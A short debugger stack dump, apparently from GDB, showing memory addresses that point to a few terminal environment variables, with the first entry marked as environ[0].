0x00007fffffffdf98│+0x0138: 0x00007fffffffe2cd → "COLORFGBG=15;0" <------ environ[0] = 0x00007fffffffdf98
0x00007fffffffdfa0│+0x0140: 0x00007fffffffe2dc → "COLORTERM=truecolor"
0x00007fffffffdfa8│+0x0148: 0x00007fffffffe2f0 → "COMMAND_NOT_FOUND_INSTALL_PROMPT=1"'''